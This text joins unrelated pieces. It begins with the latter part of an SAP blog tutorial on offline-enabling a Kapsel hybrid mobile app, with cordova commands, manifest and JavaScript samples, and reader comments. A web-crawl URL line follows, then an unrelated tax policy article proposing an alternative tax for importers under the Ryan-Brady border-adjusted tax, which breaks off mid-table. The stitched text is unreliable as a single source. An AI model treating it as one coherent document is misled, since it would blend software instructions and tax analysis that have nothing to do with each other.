URL to be Set the Proxy Type to be Internet Ensure the Rewrite mode is Rewrite URL (required for offline apps). Add an SSO Mechanism of type Basic. - Run the app. Note, the console shows the results of the build and deployment process but is truncated after a few screens of output. To see the complete log see C:\Temp\SAP_HAT_local_1_25_3\logs\command.log. Offline Enabling the Application Note, there is an issue using older versions of the Kapsel Offline plugin with Android X86 emulators. This is fixed in recent SP 14 PLs. The following blog posts may also be of interest. Creating Offline Application based on SAP Web IDE CRUD Master-Detail Template using Hybrid App Toolkit Creating an offline app with the mobile service for SAP Fiori – Part 1 Approve Purchase Order Offline for Mobile Getting Started with Kapsel – Part 10 — Offline OData(SP13+) - In Component.js, comment out the following line. //this.getModel().setUseBatch(false); - Modify the manifest.json. Add the following new section. "sap.mobile": { "_version": "1.1.0", "definingRequests": { "Products": { "dataSource": "mainService", "path": "/Products?$expand=StockDetails" } } }, In the sap.app section add the below entry. "offline": true, - Run the project on a device or emulator. Notice above that the device after the offline store has been initially created can be put in airplane mode and the product data is still available if the app is closed and reopened. - The following bits may be of interest for Kapsel developers. The following files do not appear in the SAP Web IDE but in the hybrid project. - www\mobile.json Contains the appID, serverHost, custom fields for the logon plugin etc as well as some HAT specific settings like proxy and serviceUrl. - www\hybrid\sap-mobile-hybrid.jsThe bootStrap method adds a function that is called by the deviceready event that reads mobile.json and loads hybridodata.js and logon.js - www\hybrid\kapsel\logon.js Contains methods to initialize and use the logon plugin. - www\hybrid\odata\hybridodata.js and offlineStore.js Contains methods to initialize and use the offline plugin. - At this point a hybrid project is created and the regular Cordova commands could be used to deploy the project. The project can also be recreated via the Prepare Hybrid Project menu item. Alternate Method of Offline Enabling the Application The following steps take the output from the Web IDE generated project and place it into a project created from the command line. Then some code is added to register the application with the SCPms server and open an offline store. After following these steps, you will have a better appreciation for what the HAT automates. - The following steps create a hybrid or Cordova project, add the Android platform and add the plugins. cordova create C:\Kapsel_Projects\ProductList2 com.sap.productlist2 ProductList2 cd C:\Kapsel_Projects\ProductList2 cordova -d platform add android cordova plugin add cordova-plugin-network-information cordova plugin add kapsel-plugin-barcodescanner --searchpath %KAPSEL_HOME%/plugins cordova plugin add kapsel-plugin-odata --searchpath %KAPSEL_HOME%/plugins cordova plugin add kapsel-plugin-logon --searchpath %KAPSEL_HOME%/plugins - Export the source code from the Web IDE. Place the contents of the webapp folder into the www folder. - Modify the index.html file to initialize the logon plugin and open the offline store before starting the app. Add the following include. <script type="text/javascript" charset="utf-8" src="cordova.js"></script> Then add the following code replacing the existing sap.ui.getCore().attachInit method. Also update the serverHost, user and password values. document.addEventListener("deviceready", myInit, false); var appId = "com.sap.productlist"; var applicationContext = null; var context = { "serverHost": "hcpms-p174XXXXXXtrial.hanatrial.ondemand.com", "https": true, "serverPort": 443, "user": "dan", "password": "mypwd", "custom": { "hiddenFields": ["farmId", "resourcePath", "securityConfig", "serverPort", "https"], "disablePasscode": true } } function myInit() { console.log("In deviceready/myInit"); var oCore = sap.ui.getCore(); oCore.attachInit(myRegister); } function myRegister() { console.log("In register"); var registerSuccessCallback = function(result) { console.log("In registerSuccessCallback"); applicationContext = result; openStore(); }; var registerErrorCallback = function(error) { console.log("In registerErrorCallback"); console.log("An error occurred: " + JSON.stringify(error)); navigator.app.exitApp(); }; sap.Logon.init(registerSuccessCallback, registerErrorCallback, appId, context); } function openStore() { console.log("In openStore"); jQuery.sap.require("sap.ui.thirdparty.datajs"); //Required when using SAPUI5 and the Kapsel Offline Store var properties = { "name": "ProductsOfflineStore", "host": applicationContext.registrationContext.serverHost, "port": applicationContext.registrationContext.serverPort, "https": applicationContext.registrationContext.https, "serviceRoot" : appId, "definingRequests" : { "ProductsDR" : "/Products?$expand=StockDetails" } }; store = sap.OData.createOfflineStore(properties); var openStoreSuccessCallback = function() { console.log("In openStoreSuccessCallback"); sap.OData.applyHttpClient(); //Offline OData calls can now be made against datajs. myAppStart(); } var openStoreErrorCallback = function(error) { console.log("In openStoreErrorCallback"); alert("An error occurred" + JSON.stringify(error)); } store.open(openStoreSuccessCallback, openStoreErrorCallback); } function myAppStart() { sap.ui.require([ "sap/m/Shell", "sap/ui/core/ComponentContainer" ], function (Shell, ComponentContainer) { // initialize the UI component new Shell({ app: new ComponentContainer({ height : "100%", name : "com.sap.products" }) }).placeAt("content"); }); } - Modify the manifest.json file. Remove the following line. "sap-documentation": "heading" Modify the dataSources uri as shown below. "dataSources": { "mainService": { "uri": "", - Try it out. cordova run android Updating a Deployed Hybrid App with the AppUpdate plugin (Deploy to CP mobile services) The AppUpdate plugin enables a deployed app that has registered with an SMP or SCPms server to receive updates to the HTML and JavaScript of the application. When the application starts it checks with the server if there are any updates and if there are, downloads them and then requests permission from the user to apply them. For additional details of the App Update plugin see Getting Started with Kapsel – Part 3 — AppUpdate (SP13+). - The development version of the app contains a lot of extra SAPUI5 files in the project\hybrid\www\resources folder. We will reduce that amount by using the SAPUI5 library included in the Kapsel UI5 plugin which contains a smaller subset. - Create a zip file named sapui5-mobile-custom.zip containing the contents of the following folder. C:\SAP\MobileSDK3\KapselSDK\plugins\ui5\www\resources - Place that file in the following folder C:\Users\user_name\SAPHybrid - In the Web IDE, in project settings select Hybrid, and choose to use a custom build. - Choose release mode since the custom build does not contain all of the SAPUI5 debug libraries - Add the App Update plugin to the project and set the Hybrid Revision to be 0. - Deploy the app to the device or emulator. Notice the size of the resources folder is much smaller (32 MB vs 194 MB) and that the deployment to the device is much faster. - Make a change to the app that you wish to have updated on the deployed version of the app. For example, remove the barcode scanner button by deleting the barcodebutton in Worklist.view.xml. - Deploy a zip containing the www folder of the application to the SCPms server. Browse to the generated zip file and press the Deploy button. Note if the upload fails the HTML5.SocketReadTimeout setting can be increased on the mobileservices destination. - Navigate to the management cockpit for the Mobile Services server and deploy the change. - The next time the app starts, it will check with the Mobile Services server and send down the updates. Back to Getting Started With Kapsel Hi Daniel, thank you for this great introduction to Web IDE in combination with HAT. I have a question about something that is still unclear to me. In my scenario I would like to use Web IDE with HAT and an SAP Mobile Platform 3.0. So far everything works, but I’m searching for a best practice for handling the destination urls of the odata service. From Web IDE I’m using a the Cloud Platform Connector to connect an ABAP backend. In your example you wrote to change the url in the manifest.json to something like https://<mobile_server>:<port>/<application_name> but when I use the absolute url to my mobile platform and the corresponding service, Web IDE is no longer able to connect, as the mobile platform is in my local network and not reachable for Web IDE. Therefore I’m not able to run my application for testing in Web IDE. Is there any other way (something like a best practice), as constantly switching the uri in the manifest.json? I hope I wrote my question clearly enough 🙂 Thank you! Andreas Hi Daniel, Do you know if there is any documentation available on how to perform flush and refresh for offline applications completely built on the cloud using Fiori Mobile? Also, I’ve only found this document regarding the sap.mobile namespace for the manifest.json file. But a lot of the possible parameters you can use as shown in many different blogs are not listed there. For instance I saw in one of the blogs you referenced for the offline section, that includes “stores” as an element in the json file. Thanks in advance for your help, Diego Perhaps take a look at the following blog. Abdul may be better able to help. Regards, Dan van Leeuwen Hey Daniel. Nice blog. Do you know if offline development can be done using the developer companion? I don’t believe so. I think the purpose of the developer companion is to have an app whose HTML content is updated between runs which saves time as an APK does not have to be rebuilt each time you make a code change during your development cycle. Regards, Dan van Leeuwen Hey Daniel. Thank you for getting back to me. I can see that we can build a developer companion under Fiori Mobile in the webide. Just hoped we could use that somehow. Unfortunately it takes a lot of time when I have to test the app by first builder a packaged app and then downloading that to the device. At the moment I get the error [2018-02-23 12:36:48.02072] [ET] Build failed for [IOS] [ErrorCode: 40001] [ErrorStatus: RESOURCE COLLECTION FAILED] when building the companion app. I am not sure what might be causing that error. I will forward this comment to a colleague who may be able to help. Regards, Dan van Leeuwen Hey Daniel. That is great:) thank you so much. I am building using a productive account v. 180215 of the full stack WebIde. I have Used the Master Detail template and put the sap.mobile in the manifest file: Hey Daniel. Did you manage to find out more on this problem? Hey Daniel. We are using Fiori mobile for building our packaged app with the kapsel offline plugins. We are however experiencing a problem with the bundle id: as it is using a generic: com.sap.webide.xa5a880bb81284d458cc57c71e4d69c6d instead of the wild card bundle prefix we are using in our provisioning profile. Do you know how to change this: Hi Dan, I took the installer from the hana tools website named SAP_HAT_local-1.29.1.zip when trying to install HAT i get following error: Fatal: unable to access \’\’: error: 1407742E:SSL routines:SSL23_GET_SERVER_HELLO:tlsv1 alert protocol version\n\nAdd itional error details:\nfatal: unable to access \’ er-angular.git/\’: error:1407742E:SSL routines:SSL23_GET_SERVER_HELLO:tlsv1 aler t protocol version\n’ Any ideas? Geetings, Danny Van der Steen Hi Danny, Please ignore the installer on the hana tools site. It is not up-to-date. Please use the SAP Store instead. Thanks, Ludo
https://blogs.sap.com/2017/04/11/appendix-g-sap-web-ide-fiori-mobile-and-the-hybrid-application-toolkithat/
CC-MAIN-2018-26
refinedweb
4,236
56.66
Having seen the importance of metadata and IL, let's examine the CTS and the CLS. Both the CTS and the CLS ensure language compatibility, interoperability, and integration.. In order to make language integration a reality, Microsoft has specified a common type system by which every .NET language must abide. In this section, we outline the common types that have the same conceptual semantics in every .NET language. Microsoft .NET supports a rich set of types, but we limit our discussion to the important ones, including value types, reference types, classes, interfaces, and delegates. In general, the CLR supports two different types: value types and reference types. Value types represent values allocated on the stack. They cannot be null and must always contain some data. When value types are passed into a function, they are passed by value, meaning that a copy of the value is made prior to function execution. This implies that the original value won't change, no matter what happens to the copy during the function call. Since intrinsic types are small in size and don't consume much memory, the resource cost of making a copy is negligible and outweighs the performance drawbacks of object management and garbage collection. Value types include primitives, structures, and enumerations; examples are shown in the following C# code listing: int i; // Primitive struct Point { int x, y; } // Structure enum State { Off, On } // Enumeration You can also create a value type by deriving a class from System.ValueType. One thing to note is that a value type is sealed, meaning that once you have derived a class from System.ValueType, no one else can derive from your class. If a type consumes significant memory resources, then a reference type provides more benefits over a value type. Reference types are so called because they contain references to heap-based objects and can be null. These types are passed by reference, meaning that when you pass such an object into a function, an address of or pointer to the object is passednot a copy of the object, as in the case of a value type. Since you are passing a reference, the caller will see whatever the called function does to your object. The first benefit here is that a reference type can be used as an output parameter, but the second benefit is that you don't waste extra resources because a copy is not made. If your object is large (consuming lots of memory), than reference types are a better choice. In .NET, one drawback of a reference type is that it must be allocated on the managed heap, which means it requires more CPU cycles because it must be managed and garbage-collected by the CLR. In .NET, the closest concept to destruction is finalization, but unlike destructors in C++, finalization is nondeterministic. In other words, you don't know when finalization will happen because it occurs when the garbage collector executes (by default, when the system runs out of memory). Since finalization is nondeterministic, another drawback of reference types is that if reference-type objects hold on to expensive resources that will be released during finalization, system performance will degrade because the resources won't be released until these objects are garbage-collected. Reference types include classes, interfaces, arrays, and delegates, examples of which are shown in the following C# code listing: class Car {} // Class interface ISteering {} // Interface int[] a = new int[5]; // Array delegate void Process( ); // Delegate Classes, interfaces, and delegates will be discussed shortly. Microsoft .NET supports value types for performance reasons, but everything in .NET is ultimately an object. In fact, all primitive types have corresponding classes in the .NET Framework. For example, int is, in fact, an alias of System.Int32, and System.Int32 happens to derive from System.ValueType, meaning that it is a value type. Value types are allocated on the stack by default, but they can always be converted into a heap-based, reference-type object; this is called boxing. The following code snippet shows that we can create a box and copy the value of i into it: int i = 1; // i - a value type object box = i; // box - a reference object When you box a value, you get an object upon which you can invoke methods, properties, and events. For example, once you have converted the integer into an object, as shown in this code snippet, you can call methods that are defined in System.Object, including ToString( ), Equals( ), and so forth. The reverse of boxing is of course unboxing, which means that you can convert a heap-based, reference-type object into its value-type equivalent, as the following shows: int j = (int)box; This example simply uses the cast operator to cast a heap-based object called box into a value-type integer. The CLR provides full support for object-oriented concepts (such as encapsulation, inheritance, and polymorphism) and class features (such as methods, fields, static members, visibility, accessibility, nested types, and so forth). In addition, the CLR supports new features that are nonexistent in many traditional object-oriented programming languages, including properties, indexers, and events.[10] Events are covered in Chapter 8. For now let's briefly talk about properties and indexers. [10] An event is a callback that is implemented using delegates, which is covered shortly. A property is similar to a field (a member variable), with the exception that there is a getter and a setter method, as follows: using System; public class Car { private string make; public string Make { get { return make; } set { make = value; } } public static void Main( ) { Car c = new Car( ); c.Make = "Acura"; // Use setter. String s = c.Make; // Use getter. Console.WriteLine(s); } } Although this is probably the first time you've seen such syntax, this example is straightforward and really needs no explanation, with the exception of the keyword value. This is a special keyword that represents the one and only argument to the setter method. Syntactically similar to a property, an indexer is analogous to operator[] in C++, as it allows array-like access to the contents of an object. In other words, it allows you to access an object like you're accessing an array, as shown in the following example: using System; public class Car { Car( ) { wheels = new string[4]; } private string[] wheels; public string this[int index] { get { return wheels[index]; } set { wheels[index] = value; } } public static void Main( ) { Car c = new Car( ); c[0] = "LeftWheel"; // c[0] can be an l-value or an r-value. Console.WriteLine(c[0]); } } Interfaces support exactly the same concept as a C++ abstract base class (ABC) with only pure virtual functions. An ABC is a class that declares one or more pure virtual functions and thus cannot be instantiated. If you know COM or Java, interfaces in .NET are conceptually equivalent to a COM or Java interface. You specify them, but you don't implement them. A class that derives from your interface must implement your interface. An interface may contain methods, properties, indexers, and events. In .NET, a class can derive from multiple interfaces. One of the most powerful features of C is its support for function pointers. Function pointers allow you to build software with hooks that can be implemented by someone else. In fact, function pointers allow many people to build expandable or customizable software. Microsoft .NET supports a type-safe version of function pointers, called delegates. Here's an example that may take a few minutes to sink in, but once you get it, you'll realize that it's really simple: using System; class TestDelegate { // 1. Define callback prototype. delegate void MsgHandler(string strMsg); // 2. Define callback method. void OnMsg(string strMsg) { Console.WriteLine(strMsg); } public static void Main( ) { TestDelegate t = new TestDelegate( ); // 3. Wire up our callback method. MsgHandler f = new MsgHandler(t.OnMsg); // 4. Invoke the callback method indirectly. f("Hello, Delegate."); } } The first thing to do is to define a callback function prototype, and the important keyword here is delegate, which tells the compiler that you want an object-oriented function pointer. Under the hood, the compiler generates a nested class, MsgHandler, which derives from System.MulticastDelegate.[11] A multicast delegate supports many receivers. Once you've defined your prototype, you must define and implement a method with a signature that matches your prototype. Then, simply wire up the callback method by passing the function to the delegate's constructor, as shown in this code listing. Finally, invoke your callback indirectly. Having gone over delegates, you should note that delegates form the foundation of events, which are discussed in Chapter 8. [11] If you want to see this, use ildasm.exe and view the metadata of the delegate.exe sample that we've provided. A goal of .NET is to support language integration in such a way that programs can be written in any language, yet can interoperate with one another, taking full advantage of inheritance, polymorphism, exceptions, and other features. However, languages are not made equal because one language may support a feature that is totally different from another language. For example, Managed C++ is case-sensitive, but VB.NET is not. In order to bring everyone to the same sheet of music, Microsoft has published the Common Language Specification (CLS). The CLS specifies a series of basic rules that are required for language integration. Since Microsoft provides the CLS that spells out the minimum requirements for being a .NET language, compiler vendors can build their compilers to the specification and provide languages that target .NET. Besides compiler writers, application developers should read the CLS and use its rules to guarantee language interoperation.
http://etutorials.org/Programming/.NET+Framework+Essentials/Chapter+2.+The+Common+Language+Runtime/2.6+The+CTS+and+CLS/
CC-MAIN-2018-05
refinedweb
1,616
54.42
Robot Control Difficulty: intermediate This tutorial guides you through how to drive the servos on the robot, how to have it react to its environment through the use of sensors and as an extension how to control it over Bluetooth with a Wiimote. REQUIREMENTS: It is recommended that you look through the Buttons and Switches tutorial before beginning this one. Raspberry Pi Robot chassis Custom Pi shield Battery pack Bluetooth dongle Extension: Wiimote INSTRUCTIONS: It is recommended to use one of our SD cards or images. If you are not then you will need: the RPi.GPIO library, our i2c library, a kernel allowing i2c and having loaded these drivers, preferably i2c drivers in userspace, python-smbus, python-bluez, to set your Bluetooth into discoverable mode ( sudo hciconfig hci0 piscan), python-cwiid if doing extension. See the downloads page for further information. Inspect your robot, make sure everything is connected and decide on what sensors you have available to you. First thing is to get the robot driving. Type python to get a console running, this does not need to be root for i2c control, however if you want to interface with other GPIO you will need to run as root ( sudo python) instead. In your Python console: #import our i2c libraries to be able to speak to the chip import i2c #start a connection to the chip, default frequency is 50Hz which is good for driving servos servos = i2c.I2C() Now that you have a connection to the i2c chip you may have to calibrate your servos. This is done by sending pulses which should correspond to stationary and then adjusting a screw on each servo until they stop. Make sure your robot doesn’t drive off the desk! So type: servos.setSpeeds(0,0) to set pulses going to the servos and adjust these screws until the servos stop. Now everything’s calibrated, let’s test out our control! The setSpeeds function takes two arguments, the speed for the left motor and the speed for the right. Each of these varies between -100 and 100, respectively full reverse and full forwards, with 0 being stationary. To have your robot ramp through its different speeds and then stop: import time for i in range(-100,100): servos.setSpeeds(i,i) time.sleep(0.2) servos.setSpeeds(0,0) Great! Now you know how to make your robot move. Feel free to play around for a bit and get comfortable with these controls, practice making it turn on the spot or try to drive in a square. So far you’ve had to have it tethered, what if you want it to roam free? First let’s have it move autonomously. If you’ve already done the Image Processing tutorial you can put some of that knowledge and code to use, your image detection/tracking can now become following. From the centre coordinates you can tell which side of the robot the image is, if you then use speeds for each motor proportional to distance from centre of the image you should be chasing it quickly. If you haven’t done this and don’t want to there are several other control methods available. If your robot is equipped with bump switches then you can continuously check if either switch is hit and try to respond appropriately. #after having set-up inputs appropriately as in Buttons and switches tutorial (or refer to cheat sheet) #set the robot driving leftBumpPin = 21 rightBumpPin = 18 servos.setSpeeds(100,100) while True: if (GPIO.input(leftBumpPin)): #here you may choose to turn right, spin on the spot, reverse and turn right, etc. if (GPIO.input(rightBumpPin)): #appropriate actions if right bumper hit Now let’s try and control it remotely over Bluetooth. We could dynamically search for Bluetooth devices to try to decide which to connect to with bluetooth.discover_devices() and bluetooth.lookup_name(bdaddress) but because you probably don’t want to accidentally connect to someone else’s robot it might be better to code in the address to connect to (or if you don’t want someone to steal your robot a white-list of addresses allowed to connect, or even a password for control). Find out your robot’s Bluetooth address by, in a terminal, running hciconfig | grep "BD Address" This should return something in the form of BD Address: 00:15:83:XX:XX:XX ACL MTU: 339:8 SCO MTU: 128:2 Make a note of this BD Address. We will need 2 programs, a server running on the Pi and a client running on what you want to connect with. Let’s start with the server. In a file called bluetooth-server.py: import bluetooth import i2c #create a socket on bluetooth #RFCOMM is one of several protocols bluetooth can use server_sock=bluetooth.BluetoothSocket(bluetooth.RFCOMM) #choose a port number, must be same on client and server, 1 is fine port = 1 #bind our socket to this port, the "" indicates we are happy to connect #on any available bluetooth adapter server_sock.bind(("",port)) #listen for any incoming connections server_sock.listen(1) #accept connections and create the client socket client_sock,address = server_sock.accept() print("Accepted connection from ", address) #Now is a good time to initialise our servos #maybe light an LED to indicate success as well servos = i2c.I2C() while True: #now everything is set-up we're ready to receive data data=client_sock.recv(1024) #print what we've received for debugging print( "received [%s]" % data) #now we've got data it's up to you want you want to do with it! #We recommend sending tuples and decoding them as speeds to send #ensure client and server are consistent #when finished be sure to close your sockets client_sock.close() server_sock.close() Now for the client. In bluetooth-client.py: import bluetooth #insert here the address of the Pi that you noted earlier bd_addr = "00:15:83:XX:XX:XX" #port must be consistent with server port = 1 #create a socket and connect to the server sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM) sock.connect((bd_addr,port)) #we're now ready to send data! #This will repeatedly send what a user types, you will probably want to #decide a format and check for it here so it can be easily decoded the #other side while True: input = raw_input("What would you like to send? ") if (input == "quit"): break else: sock.send(input) #close up when finished sock.close() If you run each of these (server on the Pi, client on your machine), you should be able to send message over Bluetooth, great! Try to set it so you can send tuples of speeds, or maybe forward 5 to drive for 5 seconds and left or right to turn. You can even try to get Pis talking to each other and sharing their sensor data or trying to work together. It’s up to you! Examples of Bluetooth programs: bluetooth-client.py, bluetooth-server.py EXTENSION: Wiimote Control With a bit of coding and some help from our Wiimote tutorial, you should now be able to drive the robot with a Wiimote using either buttons, accelerometer or a mix. If you want to run your program at boot you should modify /etc/rc.local (as root) and add python /home/pi/wiimote.py. This is recommended as there can be USB issues when unplugging Ethernet which may break the Bluetooth connection. An example of Mario Kart style controls: wiimote.py
http://www.cl.cam.ac.uk/~db434/raspi/robot_control/
CC-MAIN-2015-06
refinedweb
1,248
61.26
Stuart E. Leblang was Treasury associate international tax counsel from 1995 to 1997. Amy S. Elliott was formerly a contributing editor with Tax Notes magazine. In this article, Leblang and Elliott argue that Congress may want to consider an alternative tax for importers that would replace the border-adjusted tax until the cost of imports decreases sufficiently to put them into a better after-tax profit position. Amy S. Elliott. Powerful interests, including major retailers, automobile dealers, and the Koch brothers, have spent the last few weeks railing against the border-adjusted tax in the hopes that they could sway President Trump to reject what is a central component of the business tax reform plan -- called "A Better Way" -- championed by House Speaker Paul D. Ryan, R-Wis., and Ways and Means Committee Chair Kevin Brady, R-Texas. The plan would effectively replace the corporate income tax with what is called a destination-based cash flow tax. Brady has indicated that he doesn't intend to implement it overnight but may use transition rules to ensure that the currency adjustment magic (that he claims will prevent net importers from taking a hit and will protect consumers from price increases) will actually come to pass. Those assurances haven't won over the critics who see the border-adjusted tax as simply a 20 percent tax on all imports that will most likely be passed on to consumers. Because of this growing opposition, it may be prudent for Congress to consider a special backstop -- an alternative tax -- for certain importers if the currency adjustment integral to the Ryan-Brady plan doesn't come to pass right away, causing their after-tax profits to decline. A subset of businesses (including many retailers, some oil refiners, and others whose historic costs are made up of some threshold percentage of imports -- for example, 25 percent) could be allowed to use an alternative tax calculation that is more favorable than the Ryan-Brady plan in limited circumstances. This would not carve out any businesses or industries from the Ryan-Brady plan, because the alternative tax result generally would only be more favorable than the result under the Ryan-Brady plan if the dollar does not sufficiently appreciate. Businesses eligible for the alternative tax calculation would generally be allowed to deduct nearly all of their import costs from a tax base otherwise like the Ryan-Brady plan (allowing for full expensing, for example), and then would apply a tax rate similar to the top rate under current law, for example 35 percent. Businesses using the alternative tax would get a tax answer similar to current law. The alternative tax calculation contains a design feature (described in detail below) that would ensure that the only way for a business to end up with a better after-tax profit than what it has today would be for the currency to appreciate or its import costs to otherwise decrease and for it to be taxed under the Ryan-Brady plan. The alternative tax is insurance for importers that fear they'll be faced with taxes that are increasing but costs that aren't decreasing. Without it, the skepticism about currency exchange rate adjustments may prove to be insurmountable. Other alternative solutions -- including relief tied to currency adjustment failures, trade distortions, or price levels -- are unworkable because they are almost impossible to measure. Transition to the border-adjusted tax by way of a four-year, across-the-board phaseout of the import deduction and phase-in of the export exemption should also be rejected. It provides insufficient relief for importers if the currency doesn't adjust -- and if the currency adjusts more quickly in anticipation of the phase-in, exporters would be harmed. The alternative tax proposed here is designed to help reassure those businesses that are afraid they will be worse off under the Ryan-Brady plan. If the dollar gets stronger relative to other currencies -- something it has done by 25 percent over a recent 30-month period without deleterious effect -- importers will be better off not using the alternative tax calculation. The Alternative Tax Calculation We expect that the alternative tax would be available only to a limited subset of businesses with relatively high import costs (for example, those with historic import costs of 25 percent compared with total costs, although this could be refined to remove the cliff effect). The alternative tax calculation is like current law in that eligible businesses will be allowed to deduct most of their import costs. We expect the alternative tax will have a rate similar to the top corporate income tax rate under current law (somewhere around 35 percent). However, the alternative tax base will generally be smaller than it is under current law for retailers. With the exception of the import deduction, we expect it will look more like the base in the Ryan-Brady plan. While most import costs will be deductible under the alternative tax, there will be a limitation. Import costs attributable to related-party profit markup will be disallowed. This limitation is necessary to ensure that inverted companies and multinationals won't be able to use transfer pricing manipulations to shield a portion of their profits from U.S. tax. All unrelated-party import costs are deductible in the alternative tax calculation. However, related-party import costs can only be deducted as long as they're traceable to real expenditures such as costs paid for parts and labor. If a related party marks up an import purely for profit, that profit element cannot be deducted in the alternative tax calculation. (Because this is a backstop, eligible businesses will be held to higher documentation standards for substantiating cost allocations to prevent abuse.) The other caveat to the alternative tax is that it will be adjusted in cases in which it causes the business to achieve an after-tax U.S. operating profit margin that is greater than that business's historic average (which could be calculated by averaging the business's top three annual after-tax U.S. operating profit margins out of the last five years). A similar firm-by-firm baseline was contemplated in 2005 by the President's Advisory Panel on Federal Tax Reform as part of a transition to the growth and investment tax, which is like the destination-based cash flow tax. To understand how it would work, imagine that Congress enacted the Ryan-Brady plan with an alternative tax available for certain import-oriented businesses. A business with high import costs (RetailCo) calculates what its tax would be under Ryan-Brady and doesn't like what it sees. Ryan-Brady may cause RetailCo's after-tax U.S. operating profit margin to drop sharply or go negative (for examples with numbers, see the appendix). Instead, RetailCo pays the alternative tax, which generally gives it a better after-tax U.S. operating profit answer than the Ryan-Brady plan and a similar tax answer (unless it has a lot of related-party import profit markup) to what it has under current law. If at any time -- and this will generally happen when the currency adjusts and RetailCo's import costs go down -- the alternative tax calculation would cause the business to have a better after-tax U.S. operating profit margin than its historic average, then the tax due is increased (or if it is designed as a credit, the credit is decreased) to prevent such a result. According to our estimates, in many cases well before the dollar has appreciated by 25 percent (for whatever reason), the business will find that it is better off being taxed under the Ryan-Brady plan. The alternative tax isn't simple or perfect. Several complications will have to be taken into account. The use of a U.S. operating profit margin cap raises various accounting considerations, and rules will need to be established to provide uniformity and prevent manipulation. Economic factors like a recession could also affect the calculation, complicating the transition away from the alternative tax. However, if a solution like this could actually be designed to work, it could have a significant impact on the debate because it would substantially address many of the arguments levied against the Ryan-Brady plan. Insuring Against Currency Adjustment Although the alternative tax will act as insurance for importers if the currency doesn't adjust, it doesn't remove the incentive for currency adjustment. The alternative tax is designed so that if the currency fully adjusts, businesses will always be better off being taxed under the Ryan-Brady plan, all else being equal. Because of this feature, we think it shouldn't significantly impede the currency adjustment but should help feed into all of the many market factors that will fuel the change. As the dollar appreciates, the import cost deductions built into the alternative tax calculation become less and less valuable. At some point -- in many cases well before the currency has appreciated the full 25 percent anticipated under the border-adjusted tax -- businesses will want to be taxed under a system that doesn't cap their after-tax U.S. operating profits and that offers a low 20 percent rate even though they'll lose their import deductions. The revenue impact of the alternative tax will depend on the alternative tax rate (we use 35 percent, but that is just to help show how the numbers might work) and base and which businesses will be eligible. However, we think those parameters can be designed to ensure that on day 1, assuming no currency adjustment, the government would get approximately the same amount of revenue from alternative tax businesses as it receives from them now under current law. Note that if the currency doesn't adjust over time, that presumably would alter the trade balance, encouraging exports and potentially resulting in a boost to the economy. Although this alternative tax approach could raise its own unique issues under the WTO's anti-discrimination rules, we think it could be designed so that it is less problematic to implement than some alternatives. Threatening the Closed System If the perfect world that economists envision comes to pass and the Ryan-Brady plan causes the dollar to appreciate enough to offset the border-adjusted tax, few if any businesses will use the alternative tax calculation because they generally will have higher after-tax profits under Ryan-Brady. If the dollar takes time to appreciate, then as that happens -- no matter how long that takes and no matter why it is happening -- the alternative tax gives businesses more manageable after-tax U.S. operating profit margins in the meantime, reducing the chances that consumer prices will rise. We know some economists will be adverse to the idea of an alternative tax. They will argue that it threatens the integrity of the Ryan-Brady plan. They will say that any special rules for a limited group of businesses will upset the balance of the border adjustments and will undermine the appreciation of the dollar. The alternative tax is simply a political tool to generate support for the Ryan-Brady plan. If the Ryan-Brady plan can't get through Congress, whether the currency will adjust in a perfect system won't even matter. This is not an absolute carveout. Businesses that pay the alternative tax would have to pay taxes determined in part by a calculation that uses a much higher tax rate than what is in the Ryan-Brady plan. And currency adjustments are still relevant to the calculation. It is a limited carveout that could get the Ryan-Brady plan to the finish line and is worth considering. Americans who called for corporations to pay their fair share should support the Ryan-Brady plan with the alternative tax. It would help stop businesses from being able to achieve single-digit effective tax rates by putting their valuable intellectual property in tax havens and playing games with what their right hand is charging their left hand to minimize the amount of income that is taxed in the United States. Retailers have some of the highest effective tax rates (averaging close to the top rate of 35 percent) and some of the lowest profit margins. There is a perceived threat that the Ryan-Brady plan gone wrong could harm retailers. Americans are concerned that the border-adjusted tax could shrink their wallets. In politics, those concerns are hard to ignore. The alternative tax helps to address these problems. Under the alternative tax, businesses will effectively get to deduct more of their import costs so there won't be as much pressure to raise prices. If the dollar does strengthen even a little relative to other currencies, retailers will end up paying less for their imports, which will still figure into the alternative tax calculation, and their after-tax U.S. operating profits will rise up to the cap. As the dollar continues to strengthen, the low 20 percent rate looks more appealing, and the freedom from the after-tax U.S. operating profit margin cap will make more and more businesses want to be taxed under the Ryan-Brady plan. The alternative tax makes the Ryan-Brady plan more likely to be a win-win. It acts as insurance to help prevent the kinds of catastrophic outcomes feared by importers and consumers. A reform plan that helps level the playing field for U.S. businesses and helps end the transfer pricing games played by inverted companies and some multinationals is worth saving. Appendix. Taxing Importers Under the Alternative Tax ______________________________________________________________________________ This table shows how the alternative tax would work for a variety of businesses. For a business to get a higher profit margin than its historic average, import costs must go down enough for the business to want to be taxed under the Ryan-Brady plan. This happens at different levels of appreciation (15 percent in Example 1, 8 percent in Example 2, 0 percent in Example 3) de- pending on the specific profit margin and import cost profile of the business. Example 1 also shows why the profit margin cap is needed. ______________________________________________________________________________ After-Tax U.S. Operating Profit Margin ______________________________________________________________________________ Example 1: High profit margin (20.3 percent), high import cost (93 percent) business $125 U.S. receipts, $5 U.S. costs, $80 real import costs, $1 related- party import profit (import costs go down to $74.07 and 93 cents at 8 percent appreciation and $69.57 and 87 cents at 15 percent appreciation) Assuming no decrease in import costs Current law 20.3% Ryan-Brady 12.0% Alternative tax 20.0% Assuming 8 percent appreciation Ryan-Brady 16.8% Alternative tax 23.1%* Assuming 15 percent appreciation Ryan-Brady 20.4% Example 2: High profit margin (22.9 percent), medium import cost (61.7 percent) business $125 U.S. receipts, $30 U.S. costs, $50 real import costs, $1 related-party import profit (import costs go down to $46.30 and 93 cents at 8 percent appreciation) Assuming no decrease in import costs Current law 22.9% Ryan-Brady 20.0% Alternative tax 22.6% Assuming 8 percent appreciation Ryan-Brady 23.0% Example 3: High profit margin (20.3 percent), low import cost (26.7 percent) business $125 U.S. receipts, $62 U.S. costs, $23 real import costs, $1 related-party import profit Assuming no decrease in import costs Current law 20.3% Ryan-Brady 21.1% Example 4: Medium profit margin (11.4 percent), high import cost (89.3 percent) business $125 U.S. receipts, $10 U.S. costs, $92 real import costs, $1 related-party import profit (import costs go down to $76.67 and 83 cents at 20 percent appreciation) Assuming no decrease in import costs Current law 11.4% Ryan-Brady -0.8% Alternative tax 11.2% Assuming 20 percent appreciation Ryan-Brady 11.6% Example 5: Medium profit margin (10.4 percent), medium import cost (64.8 percent) business $125 U.S. receipts, $36 U.S. costs, $68 real import costs, $1 related-party 